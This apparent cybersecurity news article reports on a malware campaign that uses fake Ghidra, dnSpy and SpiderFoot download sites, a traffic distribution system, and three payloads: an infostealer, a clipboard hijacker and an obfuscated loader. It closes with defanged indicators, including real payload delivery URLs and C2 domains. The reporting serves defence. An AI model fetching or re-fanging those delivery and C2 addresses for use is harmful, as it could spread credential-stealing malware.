Hackers Impersonate Ghidra, dnSpy, and SpiderFoot to Spread Malware via Fake Download Sites

Hackers are creating convincing fake websites that impersonate popular security tools to trick users into downloading malware.

Instead of obvious phishing pages, these sites look almost identical to real project portals, complete with professional designs and links pointing to actual GitHub repositories.

The moment a user clicks the download button, something very different happens behind the scenes.

Rather than getting the software they came for, victims are silently routed through a hidden traffic-filtering layer known as a Traffic Distribution System, or TDS.

This system acts as a gatekeeper, deciding which users get redirected to malware and which receive a harmless file. It screens for location, browser type, VPN usage, and whether a security researcher might be watching, making it extremely difficult to detect or catch in the act.

Analysts at Check Point Research investigated this large-scale campaign and found that the fake sites load a JavaScript script hosted on Amazon’s CloudFront network.

This script intercepts the very first download click and quietly hands the user off to the TDS, with no visible sign that anything unusual has occurred.

Check Point said in a report shared with Cyber Security News (CSN) that the operation specifically targets tools trusted by security professionals, including Ghidra, dnSpy, and SpiderFoot.

The campaign has been active since at least December 2025, with recorded malware delivery confirmed from early January 2026. VirusTotal telemetry shows more than 5,000 submissions tied to related samples, and researchers note the real exposure is likely much higher.

The fact that the impersonated tools are used daily by security researchers makes this campaign particularly alarming, since it targets the very people trained to spot these threats.

Three distinct malware families serve as the final payloads. RemusStealer is a newly emerged infostealer targeting data from more than 20 browsers, including cryptocurrency wallets, password managers, and two-factor authentication tools.

AnimateClipper silently monitors the clipboard and swaps copied wallet addresses with attacker-controlled ones, potentially redirecting real funds without the victim ever realizing it.

A third payload named SessionGate is a multi-stage loader with heavy obfuscation and one-time-key delivery that makes it extraordinarily difficult for analysts to examine.

More than 100 active fake websites have been identified in this cluster, all sharing the same CloudFront-hosted scripts and campaign identifiers.

Sites like ghidralite[.]com and dnspy[.]org appear near the top of Google results for relevant queries, lending them a false sense of authority.

When a user hovers over the download button, the browser status bar even shows a real GitHub URL, so cautious users may not notice anything is wrong.

The JavaScript loaded by these pages listens for the user’s first interaction and intercepts it before normal navigation can proceed. On Chrome it captures a mousedown event; on Firefox it uses a click event.

It then generates a TDS runtime URL, redirects the user silently, and cancels the original navigation entirely. The victim ends up somewhere completely different from where they intended, and the whole process is invisible.

SessionGate: Built to Resist Every Analyst

Among all payloads found, SessionGate stood out for how aggressively it resists analysis.

The initial downloaded file is a 7-Zip archive around 20 MB, but the actual executable inside is only 15 MB, with the remaining 5 MB being obfuscated loader code designed to break tools like IDA’s decompiler.

Functions can exceed 500 KB in size, and encrypted strings are placed inside code regions to confuse disassemblers further.

The decryption key for the final payload stage is generated server-side and released only once per victim session. If a researcher tries to replay the chain from a different IP address, the server returns a valid-looking but useless key, making the payload completely unreadable.

Security teams are strongly advised to download software exclusively from official project pages or verified repositories, verify file hashes after downloading, and actively monitor outbound connections to the C2 domains and infrastructure identified in this campaign.

Indicators of Compromise (IoCs):-

Type	Indicator	Description
SHA-256	598b023e56c45b19173e8f96c1c88036d732fec305cf6bf1b9cf4dbe304beb7f	SessionGate Stage 1
SHA-256	74091f5a8746a1c68d73e1fc1e4e1ff514632ee3f632a8b306f35dabae2d2b64	SessionGate Stage 1
SHA-256	15e6df0c95f2147952308e640d55270e9d097639eaebb34d4b352415f1c6bceb	SessionGate Stage 1
SHA-256	3bb92771e287aa0a8bdd8e5b5bb697427223eaefded3d9b64b5d5c32ad40f3c2	SessionGate Stage 1
SHA-256	cbad672d9bd06ce91ce465d049e50696fbaec9d209ca0ab1fd814d993d04bc9b	SessionGate Stage 1 / Stage 2
SHA-256	4cdb1f7ac502289119f7f8256f00baaa994e6ecfb4000dcf5e1c46073508fcb3	SessionGate Stage 2
SHA-256	ce0888df5e28716432013a8ae002437bd3e993fbe8362c5ff9efbddabfe0ab77	SessionGate Stage 2
SHA-256	26f2abfc254a59c2386dd46dca16744f7147a0f0366cb6008e1d53219175f44c	SessionGate Stage 2
SHA-256	e6a1a428a7c09c9946f7c0179d89b263f442dc3208b5144a9146c200e4185bd6	AnimateClipper
SHA-256	87361ba2bb412dcf49f8738f3b8b9b7dccb557ad2e76ea8d98ffa5b098ae3886	AnimateClipper
SHA-256	39dc2327fe1e5a56ac5ad9dc02f0386cff3d83dcfdc558cacba42ebb9dcc5ec2	RemusStealer
SHA-256	2e842eab0c16ddd1a2ec4a56610adb58d115b65a1e08e9b67e7e375f8eed0873	RemusStealer
Domain	appfreshstart[.]com	SessionGate C2
Domain	appgetonline[.]com	SessionGate C2
Domain	webinnosetup[.]com	SessionGate C2
Domain	appmakingcenter[.]com	SessionGate C2
Domain	yourfastcrc[.]com	SessionGate CRC C2
Domain	mobileversioncrc[.]com	SessionGate CRC C2
Domain	webcrcprove[.]com	SessionGate CRC C2
Domain	integritycrc[.]com	SessionGate CRC C2
URL	http://buccstanor[.]pics:28313	RemusStealer C2 (primary)
URL	http://baxe[.]pics:48261	RemusStealer C2 (fallback)
URL	http://217.156.122[.]75:1378	RemusStealer C2
URL	http://intem[.]lat:9592	RemusStealer C2
URL	http://ropea[.]top:28313	RemusStealer C2
URL	http://forestoaker[.]com:6290	RemusStealer C2
URL	http://buccstanor[.]pics:48261	RemusStealer C2
URL	http://94.231.205[.]229:28313	RemusStealer C2
URL	http://gluckcreek[.]online:48261	RemusStealer C2
URL	https://185.0xA1.0xFB[.]58/navy.7z	AnimateClipper delivery URL
URL	http://194.150.220[.]218/4SLEYpfAk57hGubo/fo0suc2ki2.rtf	AnimateClipper stage URL
URL	https://cdn-1415.brightcanvas[.]digital/fo0suc2ki2.rtf	AnimateClipper stage URL
Domain	kr.hugo-lapp[.]co	AnimateClipper C2
Domain	io.hugo-lapp[.]lat	AnimateClipper C2
Domain	cw.hugo-lapp[.]lat	AnimateClipper C2
Domain	st.hugo-lapp[.]lat	AnimateClipper C2
Domain	td.hugo-lapp[.]lat	AnimateClipper C2
Domain	fd.hugo-lapp[.]lat	AnimateClipper C2
Domain	ed.hugo-lapp[.]lat	AnimateClipper C2
Domain	flame-guard[.]cc	AnimateClipper C2
Domain	carlessclapped[.]com	AnimateClipper C2
Domain	ghidralite[.]com	Fake Ghidra impersonation site
Domain	dnspy[.]org	Fake dnSpy impersonation site
Domain	ilspy[.]org	Fake ILSpy impersonation site
Domain	originaldownloads[.]info	SessionGate landing page
Domain	getfluxfile[.]com	SessionGate landing page
Domain	oundhertobeconsist[.]org	TDS redirector domain
Domain	javascriptapiusa[.]com	SessionGate payload validation

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.